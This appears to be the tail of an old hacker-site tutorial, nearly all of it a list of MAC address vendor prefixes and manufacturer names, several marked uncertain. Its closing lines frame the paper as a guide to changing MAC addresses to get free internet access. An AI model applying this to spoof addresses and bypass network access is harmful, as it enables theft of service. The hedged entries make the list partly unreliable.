004092 ASP Computer Products, Inc.
004094 Shographics Inc
004095 Eagle Technologies [UMC also reported]
004096 Telesystems SLW Inc
00409A Network Express Inc
00409C Transware
00409D DigiBoard Ethernet-ISDN bridges
00409E Concurrent Technologies Ltd.
00409F Lancast/Casat Technology Inc
0040A4 Rose Electronics
0040A6 Cray Research Inc.
0040AA Valmet Automation Inc
0040AD SMA Regelsysteme Gmbh
0040AE Delta Controls, Inc.
0040AF Digital Products, Inc. (DPI).
0040B4 3COM K.K.
0040B5 Video Technology Computers Ltd
0040B6 Computerm Corporation
0040B9 MACQ Electronique SA
0040BD Starlight Networks Inc
0040C1 Bizerba-Werke Wilheim Kraut
0040C2 Applied Computing Devices
0040C3 Fischer and Porter Co.
0040C5 Micom Communications Corp.
0040C6 Fibernet Research, Inc.
0040C7 Danpex Corporation
0040C8 Milan Technology Corp.
0040CC Silcom Manufacturing Technology Inc
0040CF Strawberry Tree Inc
0040D0 DEC/Compaq
0040D2 Pagine Corporation
0040D4 Gage Talker Corp.
0040D7 Studio Gen Inc
0040D8 Ocean Office Automation Ltd
0040DC Tritec Electronic Gmbh
0040DF Digalog Systems, Inc.
0040E1 Marner International Inc
0040E2 Mesa Ridge Technologies Inc
0040E3 Quin Systems Ltd
0040E5 Sybus Corporation
0040E7 Arnos Instruments & Computer
0040E9 Accord Systems, Inc.
0040EA PlainTree Systems Inc
0040ED Network Controls International Inc
0040F0 Micro Systems Inc
0040F1 Chuo Electronics Co., Ltd.
0040F4 Cameo Communications, Inc.
0040F5 OEM Engines
0040F6 Katron Computers Inc
0040F9 Combinet
0040FA Microboards Inc
0040FB Cascade Communications Corp.
0040FD LXE
0040FF Telebit Corporation Personal NetBlazer
004854 Digital SemiConductor 21143/2 based 10/100
004F49 Realtek
004F4B Pine Technology Ltd.
005004 3com 3C90X
00500F Cisco
00504D Repotec Group
00504E UMC UM9008 NE2000-compatible ISA Card for PC
005050 Cisco
005069 PixStream Incorporated
0050BD Cisco
0050E2 Cisco
005500 Xerox
006008 3Com 3Com PCI form factor 3C905 TX board
006009 Cisco Catalyst 5000 Ethernet switch
006025 Active Imaging Inc.
00602F Cisco
006030 VillageTronic used on Amiga
00603E Cisco 100Mbps interface
006047 Cisco
00604E Cycle Computer (Sun MotherBoard Replacements)
006052 Realtek (RTL 8029 == PCI NE2000)
00605C Cisco
006067 Acer Lan
006070 Cisco routers (2524 and 4500)
006083 Cisco Systems, Inc. 3620/3640 routers
00608C 3Com (1990 onwards)
006094 AMD PCNET PCI
006097 3Com
0060B0 Hewlett-Packard
0060F5 Phobos FastEthernet for Unix WS
008000 Multitech Systems Inc
008001 Periphonics Corporation
008004 Antlow Computers, Ltd.
008005 Cactus Computer Inc.
008006 Compuadd Corporation
008007 Dlog NC-Systeme
008009 Jupiter Systems (older MX-600 series machines)
00800D Vosswinkel FU
00800F SMC (Standard Microsystem Corp.)
008010 Commodore
008012 IMS Corp. IMS failure analysis tester
008013 Thomas Conrad Corp.
008015 Seiko Systems Inc
008016 Wandel & Goltermann
008017 PFU
008019 Dayna Communications "Etherprint" product
00801A Bell Atlantic
00801B Kodiak Technology
00801C Cisco
008021 Newbridge Networks Corporation
008023 Integrated Business Networks
008024 Kalpana
008026 Network Products Corporation
008029 Microdyne Corporation
00802A Test Systems & Simulations Inc
00802C The Sage Group PLC
00802D Xylogics, Inc. Annex terminal servers
00802E Plexcom, Inc.
008033 Formation (?)
008034 SMT-Goupil
008035 Technology Works
008037 Ericsson Business Comm.
008038 Data Research & Applications
00803B APT Communications, Inc.
00803D Surigiken Co Ltd
00803E Synernetics
00803F Hyundai Electronics
008042 Force Computers
008043 Networld Inc
008045 Matsushita Electric Ind Co
008046 University of Toronto
008048 Compex, used by Commodore and DEC at least
008049 Nissin Electric Co Ltd
00804C Contec Co., Ltd.
00804D Cyclone Microsystems, Inc.
008051 ADC Fibermux
008052 Network Professor
008057 Adsoft Ltd
00805A Tulip Computers International BV
00805B Condor Systems, Inc.
00805C Agilis(?)
00805F Compaq Computer Corporation
008060 Network Interface Corporation
008062 Interface Co.
008063 Richard Hirschmann Gmbh & Co
008064 Wyse
008067 Square D Company
008069 Computone Systems
00806A ERI (Empac Research Inc.)
00806B Schmid Telecommunication
00806C Cegelec Projects Ltd
00806D Century Systems Corp.
00806E Nippon Steel Corporation
00806F Onelan Ltd
008071 SAI Technology
008072 Microplex Systems Ltd
008074 Fisher Controls
008079 Microbus Designs Ltd
00807B Artel Communications Corp.
00807C FiberCom
00807D Equinox Systems Inc
008082 PEP Modular Computers Gmbh
008086 Computer Generation Inc.
008087 Okidata
00808A Summit (?)
00808B Dacoll Limited
00808C Netscout Systems (formerly Frontier Software Development)
00808D Westcove Technology BV
00808E Radstone Technology
008090 Microtek International Inc
008092 Japan Computer Industry, Inc.
008093 Xyron Corporation
008094 Sattcontrol AB
008096 HDS (Human Designed Systems) X terminals
008098 TDK Corporation
00809A Novus Networks Ltd
00809B Justsystem Corporation
00809D Datacraft Manufactur'g Pty Ltd
00809F Alcatel Business Systems
0080A1 Microtest
0080A3 Lantronix (see also 0800A3)
0080A6 Republic Technology Inc
0080A7 Measurex Corp
0080AD CNet Technology Used by Telebit (among others)
0080AE Hughes Network Systems
0080AF Allumer Co., Ltd.
0080B1 Softcom A/S
0080B2 NET (Network Equipment Technologies)
0080B6 Themis corporation
0080BA Specialix (Asia) Pte Ltd
0080C0 Penril Datability Networks
0080C2 IEEE 802.1 Committee
0080C6 Soho
0080C7 Xircom, Inc.
0080C8 D-Link (also Solectek Pocket Adapters, and LinkSys PCMCIA)
0080C9 Alberta Microelectronic Centre
0080CE Broadcast Television Systems
0080D0 Computer Products International
0080D3 Shiva Appletalk-Ethernet interface
0080D4 Chase Limited
0080D6 Apple Mac Portable(?)
0080D7 Fantum Electronics
0080D8 Network Peripherals
0080DA Bruel & Kjaer
0080E0 XTP Systems Inc
0080E3 Coral (?)
0080E7 Lynwood Scientific Dev Ltd
0080EA The Fiber Company
0080F0 Kyushu Matsushita Electric Co
0080F1 Opus
0080F3 Sun Electronics Corp
0080F4 Telemechanique Electrique
0080F5 Quantel Ltd
0080F7 Zenith Communications Products
0080FB BVM Limited
0080FE Azure Technologies Inc
009004 3Com
009027 Intel
0090B1 Cisco
00902B Cisco Ethernet Switches and Light Streams
009086 Cisco
009092 Cisco
0090AB Cisco
0090B1 Cisco
0090F2 Cisco Ethernet Switches and Light Streams
00A000 Bay Networks Ethernet switch
00A00C Kingmax Technology Inc. PCMCIA card
00A024 3com
00A040 Apple (PCI Mac)
00A04B Sonic Systems Inc. EtherFE 10/100 PCI for Mac or PC
00A073 Com21
00A083 Intel
00A092 Intermate International [LAN printer interfaces]
00A0AE Network Peripherals, Inc.
00A0C8 Adtran, Inc.
00A0C9 Intel (PRO100B and PRO100+) [used on Cisco PIX firewall among others]
00A0CC Lite-On (used by MacSense in Adapter for Mac, also seen in PCs)
00A0D1 National Semiconductor [COMPAQ Docking Station]
00A0D2 Allied Telesyn
00AA00 Intel
00B0D0 Computer Products International
00C000 Lanoptics Ltd
00C001 Diatek Patient Managment
00C002 Sercomm Corporation
00C003 Globalnet Communications
00C004 Japan Business Computer Co.Ltd
00C005 Livingston Enterprises Inc Portmaster (OEMed by Cayman)
00C006 Nippon Avionics Co Ltd
00C007 Pinnacle Data Systems Inc
00C008 Seco SRL
00C009 KT Technology (s) Pte Inc
00C00A Micro Craft
00C00B Norcontrol A.S.
00C00C ARK PC Technology, Inc.
00C00D Advanced Logic Research Inc
00C00E Psitech Inc
00C00F QNX Software Systems Ltd. [also Quantum Software Systems Ltd]
00C011 Interactive Computing Devices
00C012 Netspan Corp
00C013 Netrix
00C014 Telematics Calabasas
00C015 New Media Corp
00C016 Electronic Theatre Controls
00C017 Fluke
00C018 Lanart Corp
00C01A Corometrics Medical Systems
00C01B Socket Communications
00C01C Interlink Communications Ltd.
00C01D Grand Junction Networks, Inc. (Cisco Catalyst also reported)
00C01F S.E.R.C.E.L.
00C020 Arco Electronic, Control Ltd.
00C021 Netexpress
00C023 Tutankhamon Electronics
00C024 Eden Sistemas De Computacao SA
00C025 Dataproducts Corporation
00C027 Cipher Systems, Inc.
00C028 Jasco Corporation
00C029 Kabel Rheydt AG
00C02A Ohkura Electric Co
00C02B Gerloff Gesellschaft Fur
00C02C Centrum Communications, Inc.
00C02D Fuji Photo Film Co., Ltd.
00C02E Netwiz
00C02F Okuma Corp
00C030 Integrated Engineering B. V.
00C031 Design Research Systems, Inc.
00C032 I-Cubed Limited
00C033 Telebit Corporation
00C034 Dale Computer Corporation
00C035 Quintar Company
00C036 Raytech Electronic Corp
00C039 Silicon Systems
00C03B Multiaccess Computing Corp
00C03C Tower Tech S.R.L.
00C03D Wiesemann & Theis Gmbh
00C03E Fa. Gebr. Heller Gmbh
00C03F Stores Automated Systems Inc
00C040 ECCI
00C041 Digital Transmission Systems
00C042 Datalux Corp.
00C043 Stratacom
00C044 Emcom Corporation
00C045 Isolation Systems Inc
00C046 Kemitron Ltd
00C047 Unimicro Systems Inc
00C048 Bay Technical Associates
00C049 US Robotics Total Control (tm) NETServer Card
00C04D Mitec Ltd
00C04E Comtrol Corporation
00C04F Dell
00C050 Toyo Denki Seizo K.K.
00C051 Advanced Integration Research
00C055 Modular Computing Technologies
00C056 Somelec
00C057 Myco Electronics
00C058 Dataexpert Corp
00C059 Nippondenso Corp
00C05B Networks Northwest Inc
00C05C Elonex PLC
00C05D L&N Technologies
00C05E Vari-Lite Inc
00C060 ID Scandinavia A/S
00C061 Solectek Corporation
00C063 Morning Star Technologies Inc May be miswrite of 0003C6
00C064 General Datacomm Ind Inc
00C065 Scope Communications Inc
00C066 Docupoint, Inc.
00C067 United Barcode Industries
00C068 Philp Drake Electronics Ltd
00C069 California Microwave Inc
00C06A Zahner-Elektrik Gmbh & Co KG
00C06B OSI Plus Co
00C06B OSI Plus Corporation
00C06C SVEC Computer Corp
00C06D Boca Research, Inc.
00C06F Komatsu Ltd
00C070 Sectra Secure-Transmission AB
00C071 Areanex Communications, Inc.
00C072 KNX Ltd
00C073 Xedia Corporation
00C074 Toyoda Automatic Loom Works Ltd
00C075 Xante Corporation
00C076 I-Data International A-S
00C077 Daewoo Telecom Ltd
00C078 Computer Systems Engineering
00C079 Fonsys Co Ltd
00C07A Priva BV
00C07B Ascend Communications ISDN bridges/routers
00C07D RISC Developments Ltd
00C07F Nupon Computing Corp
00C080 Netstar Inc
00C081 Metrodata Ltd
00C082 Moore Products Co
00C084 Data Link Corp Ltd
00C085 Canon
00C086 The Lynk Corporation
00C087 UUNET Technologies Inc
00C089 Telindus Distribution
00C08A Lauterbach Datentechnik Gmbh
00C08B RISQ Modular Systems Inc
00C08C Performance Technologies Inc
00C08D Tronix Product Development
00C08E Network Information Technology
00C08F Matsushita Electric Works, Ltd.
00C090 Praim S.R.L.
00C091 Jabil Circuit, Inc.
00C092 Mennen Medical Inc
00C093 Alta Research Corp.
00C095 Znyx (Network Appliance); Jupiter Systems (MX-700); Apple (G3) all seen
00C096 Tamura Corporation
00C097 Archipel SA
00C098 Chuntex Electronic Co., Ltd.
00C09B Reliance Comm/Tec, R-Tec Systems Inc
00C09C TOA Electronic Ltd
00C09D Distributed Systems Int'l, Inc.
00C09F Quanta Computer Inc
00C0A0 Advance Micro Research, Inc.
00C0A1 Tokyo Denshi Sekei Co
00C0A2 Intermedium A/S
00C0A3 Dual Enterprises Corporation
00C0A4 Unigraf OY
00C0A7 SEEL Ltd
00C0A8 GVC Corporation
00C0A9 Barron McCann Ltd
00C0AA Silicon Valley Computer
00C0AB Jupiter Technology Inc
00C0AC Gambit Computer Communications
00C0AD Computer Communication Systems
00C0AE Towercom Co Inc DBA PC House
00C0B0 GCC Technologies,Inc.
00C0B2 Norand Corporation
00C0B3 Comstat Datacomm Corporation
00C0B4 Myson Technology Inc
00C0B5 Corporate Network Systems Inc
00C0B6 Meridian Data Inc
00C0B7 American Power Conversion Corp
00C0B8 Fraser's Hill Ltd.
00C0B9 Funk Software Inc
00C0BA Netvantage
00C0BB Forval Creative Inc
00C0BD Inex Technologies, Inc.
00C0BE Alcatel - Sel
00C0BF Technology Concepts Ltd
00C0C0 Shore Microsystems Inc
00C0C1 Quad/Graphics Inc
00C0C2 Infinite Networks Ltd.
00C0C3 Acuson Computed Sonography
00C0C4 Computer Operational
00C0C5 SID Informatica
00C0C6 Personal Media Corp
00C0C8 Micro Byte Pty Ltd
00C0C9 Bailey Controls Co
00C0CA Alfa, Inc.
00C0CB Control Technology Corporation
00C0CD Comelta S.A.
00C0D0 Ratoc System Inc
00C0D1 Comtree Technology Corporation (EFA also reported)
00C0D2 Syntellect Inc
00C0D4 Axon Networks Inc
00C0D5 Quancom Electronic Gmbh
00C0D6 J1 Systems, Inc.
00C0D9 Quinte Network Confidentiality Equipment Inc
00C0DB IPC Corporation (Pte) Ltd
00C0DC EOS Technologies, Inc.
00C0DE ZComm Inc
00C0DF Kye Systems Corp
00C0E1 Sonic Solutions
00C0E2 Calcomp, Inc.
00C0E3 Ositech Communications Inc
00C0E4 Landis & Gyr Powers Inc
00C0E5 GESPAC S.A.
00C0E6 TXPORT
00C0E7 Fiberdata AB
00C0E8 Plexcom Inc
00C0E9 Oak Solutions Ltd
00C0EA Array Technology Ltd.
00C0EC Dauphin Technology
00C0ED US Army Electronic Proving Ground
00C0EE Kyocera Corporation
00C0EF Abit Corporation
00C0F0 Kingston Technology Corporation
00C0F1 Shinko Electric Co Ltd
00C0F2 Transition Engineering Inc
00C0F3 Network Communications Corp
00C0F4 Interlink System Co., Ltd.
00C0F5 Metacomp Inc
00C0F6 Celan Technology Inc.
00C0F7 Engage Communication, Inc.
00C0F8 About Computing Inc.
00C0FA Canary Communications Inc
00C0FB Advanced Technology Labs
00C0FC ASDG Incorporated
00C0FD Prosum
00C0FF Box Hill Systems Corporation
00DD00 Ungermann-Bass IBM RT
00DD01 Ungermann-Bass
00DD08 Ungermann-Bass
00E011 Uniden Corporation
00E014 Cisco
00E016 rapid-city (now a part of bay networks)
00E018 Asustek Intel 82558-based Integrated Fast Ethernet for WIM
00E01E Cisco
00E029 SMC EtherPower II 10/100
00E02C AST - built into 5166M PC motherboard (win95 id's as Intel)
00E034 Cisco
00E039 Paradyne 7112 T1 DSU/CSU
00E04F Cisco
00E07D Encore (Netronix?) 10/100 PCI Fast ethernet card
00E081 Tyan Computer Corp. Onboard Intel 82558 10/100
00E083 Jato Technologies, Inc.
00E08F Cisco Systems Catalyst 2900 series
00E098 Linksys PCMCIA card
00E0A3 Cisco Systems Catalyst 1924
00E0B0 Cisco Systems Various systems reported
00E0B8 AMD PCNet in a Gateway 2000
00E0C5 BCOM Electronics Inc.
00E0ED New Link
00E0F7 Cisco
00E0F9 Cisco
00E0FE Cisco
020406 BBN internal usage (not registered)
020701 Interlan [now Racal-InterLAN] DEC (UNIBUS or QBUS), Apollo, Cisco
020701 Racal-Datacom
026060 3Com
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco; Macintosh
02A0C9 Intel
02AA3C Olivetti
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
02E03B Prominet Corporation Gigabit Ethernet Switch
02E6D3 BTI (Bus-Tech, Inc.) IBM Mainframes
048845 Bay Networks token ring line card
080001 Computer Vision
080002 3Com (formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080006 Siemens Nixdorf PC clone
080007 Apple
080008 BBN (Bolt Beranek and Newman, Inc.)
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys also Ascom-Timeplex (former Unisys subsidiary)
08000D ICL (International Computers, Ltd.)
08000E NCR/AT&T
08000F SMC (Standard Microsystems Corp.)
080010 AT&T [misrepresentation of 800010?]
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 National Semiconductor Corp. (used to have Network System Corp., wrong NSC)
08001A Tiara? (used to have Data General)
08001B Data General
08001E Apollo
08001F Sharp
080020 Sun
080022 NBI (Nothing But Initials)
080023 Matsushita Denso
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080030 CERN
080032 Tigan
080036 Intergraph CAE stations
080037 Fuji Xerox
080038 Bull
080039 Spider Systems
08003B Torus Systems
08003D cadnetix
08003E Motorola VME bus processor modules
080041 DCA (Digital Comm. Assoc.)
080044 DSI (DAVID Systems, Inc.)
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080048 Eurotherm Gauging Systems
080049 Univation
08004C Encore
08004E BICC [3com bought BICC, so may appear on 3com equipment as well]
080051 Experdata
080056 Stanford University
080057 Evans & Sutherland (?)
080058 ??? DECsystem-20
08005A IBM
080066 AGFA printers, phototypesetters etc.
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
08006A ATTst (?)
08006E Excelan
080070 Mitsubishi
080074 Casio
080075 DDE (Danish Data Elektronik A/S)
080077 TSL (now Retix)
080079 Silicon Graphics
08007C Vitalink TransLAN III
080080 XIOS
080081 Crosfield Electronics
080083 Seiko Denshi
080086 Imagen/QMS
080087 Xyplex terminal servers
080088 McDATA Corporation
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
08008E Tandem / Solbourne Computer ?
08008F Chipcom Corp.
080090 Retix, Inc. Bridges
09006A AT&T
10005A IBM
100090 Hewlett-Packard Advisor products
1000D4 DEC
1000E0 Apple A/UX (modified addresses for licensing)
2E2E2E LAA (Locally Administered Address) for Meditech Systems
3C0000 3Com dual function (V.34 modem + Ethernet) card
400003 Net Ware (?)
444553 Microsoft (Windows95 internal "adapters")
444649 DFI (Diamond Flower Industries)
475443 GTC (Not registered!) (This number is a multicast!)
484453 HDS ???
484C00 Network Solutions
4854E8 winbond?
4C424C Information Modes software modified addresses (not registered?)
525400 Realtek (UpTech? also reported)
52544C Novell 2000
5254AB REALTEK (a Realtek 8029 based PCI Card)
565857 Aculab plc audio bridges
800010 AT&T [misrepresented as 080010? One source claims this is correct]
80AD00 CNET Technology Inc. (Probably an error, see instead 0080AD)
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for DECNET systems
C00000 Western Digital (may be reversed 00 00 C0?)
EC1000 Enance Source Co., Ltd. PC clones(?)
E20C0F Kingston Technologies
Well now this Paper is Becoming Much more bigger and bigger and i think this should be enough about MAC Addresses, Changing them and Also Getting Free Internet right ?
This article has been taken from: http://www.arson-network.com/index.php?class=tutorial&subargs=686
